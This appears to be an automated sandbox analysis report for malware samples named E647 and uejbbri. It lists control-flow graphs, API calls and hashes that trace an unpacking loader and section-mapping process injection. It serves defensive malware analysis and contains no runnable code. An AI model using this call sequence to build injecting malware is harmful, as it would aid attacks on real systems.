                                                                        execution_graph 4212 267ed66 4213 267ed75 4212->4213 4216 267f506 4213->4216 4217 267f521 4216->4217 4218 267f52a CreateToolhelp32Snapshot 4217->4218 4219 267f546 Module32First 4217->4219 4218->4217 4218->4219 4220 267f555 4219->4220 4221 267ed7e 4219->4221 4223 267f1c5 4220->4223 4224 267f1f0 4223->4224 4225 267f201 VirtualAlloc 4224->4225 4226 267f239 4224->4226 4225->4226 4226->4226 4246 403043 4247 40319a 4246->4247 4248 40306d 4246->4248 4248->4247 4249 403128 RtlCreateUserThread NtTerminateProcess 4248->4249 4249->4247 4271 24e0005 4276 24e092b GetPEB 4271->4276 4273 24e0030 4278 24e003c 4273->4278 4277 24e0972 4276->4277 4277->4273 4279 24e0049 4278->4279 4280 24e0e0f 2 API calls 4279->4280 4281 24e0223 4280->4281 4282 24e0d90 GetPEB 4281->4282 4283 24e0238 VirtualAlloc 4282->4283 4284 24e0265 4283->4284 4285 24e02ce VirtualProtect 4284->4285 4287 24e030b 4285->4287 4286 24e0439 VirtualFree 4290 24e04be LoadLibraryA 4286->4290 4287->4286 4289 24e08c7 4290->4289 4291 24e0001 4292 24e0005 4291->4292 4293 24e092b GetPEB 4292->4293 4294 24e0030 4293->4294 4295 24e003c 7 API calls 4294->4295 4296 24e0038 4295->4296 4297 4014cf 4298 4014d3 4297->4298 4299 401660 NtDuplicateObject 4298->4299 4308 401571 4298->4308 4300 40167d NtCreateSection 4299->4300 4299->4308 4301 4016a3 NtMapViewOfSection 4300->4301 4302 4016fd NtCreateSection 4300->4302 4301->4302 4304 4016c6 NtMapViewOfSection 4301->4304 4303 401729 4302->4303 4302->4308 4306 401733 NtMapViewOfSection 4303->4306 4303->4308 4304->4302 4305 4016e4 4304->4305 4305->4302 4307 40175a NtMapViewOfSection 4306->4307 4306->4308 4307->4308 4410 4015d5 4411 4015e4 4410->4411 4412 401660 NtDuplicateObject 4411->4412 4416 40177c 4411->4416 4413 40167d NtCreateSection 4412->4413 4412->4416 4414 4016a3 NtMapViewOfSection 4413->4414 4415 4016fd NtCreateSection 4413->4415 4414->4415 4418 4016c6 NtMapViewOfSection 4414->4418 4415->4416 4417 401729 
4415->4417 4417->4416 4420 401733 NtMapViewOfSection 4417->4420 4418->4415 4419 4016e4 4418->4419 4419->4415 4420->4416 4421 40175a NtMapViewOfSection 4420->4421 4421->4416 4250 402f16 4251 402f1a 4250->4251 4253 402fa2 4251->4253 4254 401991 4251->4254 4255 4019a0 4254->4255 4256 4019d8 Sleep 4255->4256 4258 4019f3 4256->4258 4259 4014c4 4256->4259 4258->4253 4260 4014d3 4259->4260 4261 401660 NtDuplicateObject 4260->4261 4270 401571 4260->4270 4262 40167d NtCreateSection 4261->4262 4261->4270 4263 4016a3 NtMapViewOfSection 4262->4263 4264 4016fd NtCreateSection 4262->4264 4263->4264 4266 4016c6 NtMapViewOfSection 4263->4266 4265 401729 4264->4265 4264->4270 4268 401733 NtMapViewOfSection 4265->4268 4265->4270 4266->4264 4267 4016e4 4266->4267 4267->4264 4269 40175a NtMapViewOfSection 4268->4269 4268->4270 4269->4270 4270->4258 4369 402e9a 4370 402e5f 4369->4370 4371 402eaf 4369->4371 4372 401991 8 API calls 4371->4372 4373 402fa2 4371->4373 4372->4373 4321 402ee7 4322 402ef9 4321->4322 4323 401991 8 API calls 4322->4323 4324 402fa2 4322->4324 4323->4324 4473 4019a9 4474 4019a0 4473->4474 4475 4019d8 Sleep 4474->4475 4476 4014c4 7 API calls 4475->4476 4477 4019f3 4475->4477 4476->4477 4227 24e003c 4228 24e0049 4227->4228 4240 24e0e0f SetErrorMode SetErrorMode 4228->4240 4233 24e0265 4234 24e02ce VirtualProtect 4233->4234 4236 24e030b 4234->4236 4235 24e0439 VirtualFree 4239 24e04be LoadLibraryA 4235->4239 4236->4235 4238 24e08c7 4239->4238 4241 24e0223 4240->4241 4242 24e0d90 4241->4242 4243 24e0dad 4242->4243 4244 24e0dbb GetPEB 4243->4244 4245 24e0238 VirtualAlloc 4243->4245 4244->4245 4245->4233 4374 401373 4375 401381 VirtualProtect 4374->4375 4377 40133e 4375->4377 4378 401975 4379 401979 4378->4379 4380 4014c4 7 API calls 4379->4380 4381 4019f3 4380->4381 4386 267ed58 4387 267ed66 4386->4387 4388 267f506 3 API calls 4387->4388 4389 267ed7e 4388->4389

                                                                        Control-flow Graph

                                                                        control_flow_graph 85 4014c4-4014f6 91 4014f9-40150d call 401240 85->91 96 401512-401513 91->96 97 401544-401545 96->97 98 401515-401528 96->98 100 401547 97->100 101 4015bd-4015d4 97->101 98->91 99 40152a-401535 98->99 99->96 105 401537-401543 99->105 102 401596-4015a6 100->102 103 401549-40154b 100->103 106 4015a8 102->106 103->106 107 40154d-40156d 103->107 105->97 109 4015e7-40160a call 401240 107->109 110 40156f 107->110 119 40160c 109->119 120 40160f-401614 109->120 112 401571 110->112 113 4015e2-4015e3 110->113 113->109 119->120 122 40161a-40162b 120->122 123 40193e-401946 120->123 126 401631-40165a 122->126 127 40193c 122->127 123->120 128 40194b-40198e call 401240 123->128 126->127 135 401660-401677 NtDuplicateObject 126->135 127->128 135->127 137 40167d-4016a1 NtCreateSection 135->137 139 4016a3-4016c4 NtMapViewOfSection 137->139 140 4016fd-401723 NtCreateSection 137->140 139->140 144 4016c6-4016e2 NtMapViewOfSection 139->144 140->127 143 401729-40172d 140->143 143->127 147 401733-401754 NtMapViewOfSection 143->147 144->140 146 4016e4-4016fa 144->146 146->140 147->127 149 40175a-401776 NtMapViewOfSection 147->149 149->127 152 40177c 149->152 152->127 153 40177c call 401781 152->153 153->127
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2653902687.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_E647.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:

                                                                        Control-flow Graph
                                                                        • Function at 004015D5 (edge list omitted); API calls listed below, internal calls to 401240, 401781
                                                                        APIs
                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2653902687.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_E647.jbxd
                                                                        Similarity
                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                        • String ID:
                                                                        • API String ID: 1546783058-0

                                                                        Control-flow Graph
                                                                        • Function at 004015DF (edge list omitted); API calls listed below, internal calls to 401240, 401781
                                                                        APIs
                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2653902687.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_E647.jbxd
                                                                        Similarity
                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                        • String ID:
                                                                        • API String ID: 1546783058-0

                                                                        Control-flow Graph
                                                                        • Function at 004015F2 (edge list omitted); API calls listed below, internal calls to 401240, 401781
                                                                        APIs
                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2653902687.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_E647.jbxd
                                                                        Similarity
                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                        • String ID:
                                                                        • API String ID: 1546783058-0

                                                                        Control-flow Graph
                                                                        • Function at 004015E6 (edge list omitted); API calls listed below, internal calls to 401240, 401781
                                                                        APIs
                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2653902687.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_E647.jbxd
                                                                        Similarity
                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                        • String ID:
                                                                        • API String ID: 1546783058-0

                                                                        Control-flow Graph
                                                                        • Function at 00403043 (edge list omitted); calls RtlCreateUserThread and NtTerminateProcess
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2653902687.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_E647.jbxd
                                                                        Similarity
                                                                        • API ID: CreateProcessTerminateThreadUser
                                                                        • String ID:
                                                                        • API String ID: 1921587553-0

                                                                        Control-flow Graph
                                                                        • Function at 024E003C (edge list omitted); calls VirtualAlloc, VirtualProtect, VirtualFree, LoadLibraryA and internal routines 24e0a3f, 24e0e0f, 24e0d90, 24e0a69, 24e0cce, 24e0ce7
                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 024E024D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2655265915.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_24e0000_E647.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID: cess$kernel32.dll
                                                                        • API String ID: 4275171209-1230238691

                                                                        Control-flow Graph
                                                                        • Function at 0267F506 (edge list omitted); calls CreateToolhelp32Snapshot, Module32First and internal routine 267f1c5
                                                                        APIs
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0267F52E
                                                                        • Module32First.KERNEL32(00000000,00000224), ref: 0267F54E
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2655596562.000000000266D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0266D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_266d000_E647.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                        • String ID:
                                                                        • API String ID: 3833638111-0

                                                                        Control-flow Graph
                                                                        • Function at 024E0E0F (edge list omitted); calls SetErrorMode twice
                                                                        APIs
                                                                        • SetErrorMode.KERNELBASE(00000400,?,?,024E0223,?,?), ref: 024E0E19
                                                                        • SetErrorMode.KERNELBASE(00000000,?,?,024E0223,?,?), ref: 024E0E1E
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2655265915.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_24e0000_E647.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorMode
                                                                        • String ID:
                                                                        • API String ID: 2340568224-0

                                                                        Control-flow Graph
                                                                        • Function at 00401991 (edge list omitted); calls Sleep and internal routines 401240, 4014c4, 4015b7
                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 004019E0
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2653902687.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_E647.jbxd
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID:
                                                                        • API String ID: 3472027048-0

                                                                        Control-flow Graph
                                                                        • Function at 004019A9 (edge list omitted); calls Sleep and internal routines 401240, 4014c4, 4015b7
                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 004019E0
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2653902687.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_E647.jbxd
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID:
                                                                        • API String ID: 3472027048-0
                                                                        • Opcode ID: 2350c7394a6ede19c9a3da40f224c600cb7e67420b87972ec1723c2f239d6a32
                                                                        • Instruction ID: 4b76d244f62df5aef60288e90a8a0e9aa1e58495ecd570ece09185835f727098
                                                                        • Opcode Fuzzy Hash: 2350c7394a6ede19c9a3da40f224c600cb7e67420b87972ec1723c2f239d6a32
                                                                        • Instruction Fuzzy Hash: E801CCB1709204EBDB009A849DA2FBB3254AB45704F304177BA53B91F1C13EA513BBAF

Control-flow Graph (rendered graph not reproduced; entry block 4019af, API call in graph: Sleep)
APIs
• Sleep.KERNELBASE(00001388), ref: 004019E0
Memory Dump Source
• Source File: 00000006.00000002.2653902687.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_E647.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 8626c13d4c5bea9750268c441cbe70d84321be4982c5847259c3e7a51e7bc089
• Instruction ID: a86496d5c410a92ffac719b016bd7af058b42942f4ddbef250fd57ab9bd781cb
• Opcode Fuzzy Hash: 8626c13d4c5bea9750268c441cbe70d84321be4982c5847259c3e7a51e7bc089
• Instruction Fuzzy Hash: BA01DE71309204EBDB00AA848C81BAB3264AB45300F204177F653790F1D23E9522AF5B

Control-flow Graph (rendered graph not reproduced; entry block 4019b8, API call in graph: Sleep)
APIs
• Sleep.KERNELBASE(00001388), ref: 004019E0
Memory Dump Source
• Source File: 00000006.00000002.2653902687.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_E647.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 7cb05b4a08deaf112b9499aec8d4cd6db564fb490b0e62221787527af13cff27
• Instruction ID: 05dce09b803754dc438333d14fb16c9d77e26ddd6ef6fde50045693b00902851
• Opcode Fuzzy Hash: 7cb05b4a08deaf112b9499aec8d4cd6db564fb490b0e62221787527af13cff27
• Instruction Fuzzy Hash: 67019E31309104EBEB009B949C82BAB3764AF46314F2445B7F652B91E1D63D9922AB5B

Control-flow Graph (rendered graph not reproduced; entry block 267f1c5, API call in graph: VirtualAlloc)
APIs
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0267F216
Memory Dump Source
• Source File: 00000006.00000002.2655596562.000000000266D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0266D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_266d000_E647.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
• Instruction ID: fbb9baa782d1ca38b2fafafe134811812fee6eb86e773cd6243ff91d34a09328
• Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
• Instruction Fuzzy Hash: A0113C79A00208EFDB01DF98C985E98BBF5AF08350F1580A4F9489B361D371EA90DF90

Execution Graph

Execution Coverage: 6.3%
Dynamic/Decrypted Code Coverage: 43.3%
Signature Coverage: 0%
Total number of Nodes: 120
Total number of Limit Nodes: 4
(rendered execution graph not reproduced; API calls appearing as graph nodes: RtlCreateUserThread, NtTerminateProcess, GetPEB, VirtualAlloc, VirtualProtect, VirtualFree, LoadLibraryA, NtDuplicateObject, NtCreateSection, NtMapViewOfSection, CreateToolhelp32Snapshot, Module32First, Sleep, SetErrorMode)

Control-flow Graph (rendered graph not reproduced; entry block 4014c4, API calls in graph: NtDuplicateObject, NtCreateSection, NtMapViewOfSection)
Memory Dump Source
• Source File: 00000007.00000002.2893773233.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_uejbbri.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a4cfe7beb35eebf88c645a46c10bdf16ef044b5e65f6e3ad60f9fe20b10e07c2
• Instruction ID: a2440897234d9063cbd2a71cb92c382042c3cd10596cdc4f18a7c269882a1901
• Opcode Fuzzy Hash: a4cfe7beb35eebf88c645a46c10bdf16ef044b5e65f6e3ad60f9fe20b10e07c2
• Instruction Fuzzy Hash: 0981D5B4504244FBDB208F95CC49FEB7BB8EF81740F20416BF902BA1E5D6749902DB66

Control-flow Graph (rendered graph not reproduced; entry block 4015d5, API calls in graph: NtDuplicateObject, NtCreateSection, NtMapViewOfSection)
APIs
• NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
• NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
• NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
Memory Dump Source
• Source File: 00000007.00000002.2893773233.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_uejbbri.jbxd
Similarity
• API ID: Section$View$Create$DuplicateObject
• String ID:
• API String ID: 1546783058-0
• Opcode ID: a048fff95c548b67d4af93e06dbb446bf3167c5580fcedad9e3c57286057ba63
• Instruction ID: 5b275a0397ac31cab10c66c3112b8ecfdbc4447489e22d1c2cba3eb21d005058
• Opcode Fuzzy Hash: a048fff95c548b67d4af93e06dbb446bf3167c5580fcedad9e3c57286057ba63
• Instruction Fuzzy Hash: 8251F9B5900245BBEB208F91CC48FEF7BB8EF85710F10416AFA11BA2A5D7759941CB64

Control-flow Graph (rendered graph not reproduced; entry block 4015df, API calls in graph: NtDuplicateObject, NtCreateSection, NtMapViewOfSection)
APIs
• NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
• NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
• NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
Memory Dump Source
• Source File: 00000007.00000002.2893773233.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_uejbbri.jbxd
Similarity
• API ID: Section$View$Create$DuplicateObject
• String ID:
• API String ID: 1546783058-0
• Opcode ID: 7305ee3979d5b4667fc5844815bc59bb72ccff8572694ad63906bf8bfbab0545
• Instruction ID: aa7ad941c6157971e71dc2736092b98b642c15495c2c07021be349f0f8194e9f
• Opcode Fuzzy Hash: 7305ee3979d5b4667fc5844815bc59bb72ccff8572694ad63906bf8bfbab0545
• Instruction Fuzzy Hash: 4D51FAB5900249BBEB208F91CC48FEF7BB8EF85710F10015AFA11BA2A5D7749945CB64

Control-flow Graph (rendered graph not reproduced; entry block 4015f2, API calls in graph: NtDuplicateObject, NtCreateSection, NtMapViewOfSection)
APIs
• NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
• NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
• NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
Memory Dump Source
• Source File: 00000007.00000002.2893773233.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_uejbbri.jbxd
Similarity
• API ID: Section$View$Create$DuplicateObject
• String ID:
• API String ID: 1546783058-0
• Opcode ID: 6fcf8b22fbdcb8380d2881299c31f747d5ad1c4e66094b591aeffa0cf5ced54e
• Instruction ID: 51677960ee3875d5e78d4b2c0b9a124aae989836c1cf5ff6a0c78d9f2f0b6c9a
• Opcode Fuzzy Hash: 6fcf8b22fbdcb8380d2881299c31f747d5ad1c4e66094b591aeffa0cf5ced54e
• Instruction Fuzzy Hash: 8E51FAB5900249BBEB208F91CC48FAFBBB8EF85710F10415AF911BA2A5D7759941CB64

Control-flow Graph (rendered graph not reproduced; entry block 4015e6, API calls in graph: NtDuplicateObject, NtCreateSection, NtMapViewOfSection)
APIs
• NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
• NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
• NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
Memory Dump Source
• Source File: 00000007.00000002.2893773233.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_uejbbri.jbxd
Similarity
• API ID: Section$View$Create$DuplicateObject
• String ID:
• API String ID: 1546783058-0
• Opcode ID: da093589d2d920786b053f62cd85dab4a028aa54c55a505f1a39e86dd67689ba
• Instruction ID: 771dbcf6e2504e630b0d67c3c545d31db11f89db77175d6a648901ef483dfe93
• Opcode Fuzzy Hash: da093589d2d920786b053f62cd85dab4a028aa54c55a505f1a39e86dd67689ba
• Instruction Fuzzy Hash: 5451F9B5900249BFEB208F91CC48FEFBBB8EF85B10F100159F911BA2A5D7709945CB64

                                                                        Control-flow Graph
                                                                        • Function at 00403043; graph nodes reference RtlCreateUserThread and NtTerminateProcess
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2893773233.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_400000_uejbbri.jbxd
                                                                        Similarity
                                                                        • API ID: CreateProcessTerminateThreadUser
                                                                        • String ID:
                                                                        • API String ID: 1921587553-0
                                                                        • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                        • Instruction ID: 174b4c01c38e91558bfb09f2734ea8af57ab2b253068959c7a4b5a028629c542
                                                                        • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                        • Instruction Fuzzy Hash: 2D415A31218E084FD768EF5CA84976277D5FB98311F6A43BAE809D7385EA34DC1183C9

                                                                        Control-flow Graph
                                                                        • Function at 024A003C; graph nodes reference VirtualAlloc, VirtualProtect, VirtualFree and LoadLibraryA
                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 024A024D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2900388143.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_24a0000_uejbbri.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID: cess$kernel32.dll
                                                                        • API String ID: 4275171209-1230238691
                                                                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                        • Instruction ID: 47db5edc071913791deb89cbc8230648d4aa3d877f6c379e8469fc357dd10e18
                                                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                        • Instruction Fuzzy Hash: 3C526974A01229DFDB64CF58C994BADBBB1BF09304F1480DAE94DAB351DB30AA95CF14

                                                                        Control-flow Graph
                                                                        • Function at 025FF32E; graph nodes reference CreateToolhelp32Snapshot and Module32First
                                                                        APIs
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 025FF356
                                                                        • Module32First.KERNEL32(00000000,00000224), ref: 025FF376
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2900663679.00000000025ED000.00000040.00000020.00020000.00000000.sdmp, Offset: 025ED000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_25ed000_uejbbri.jbxd
                                                                        Yara matches
                                                                        Similarity
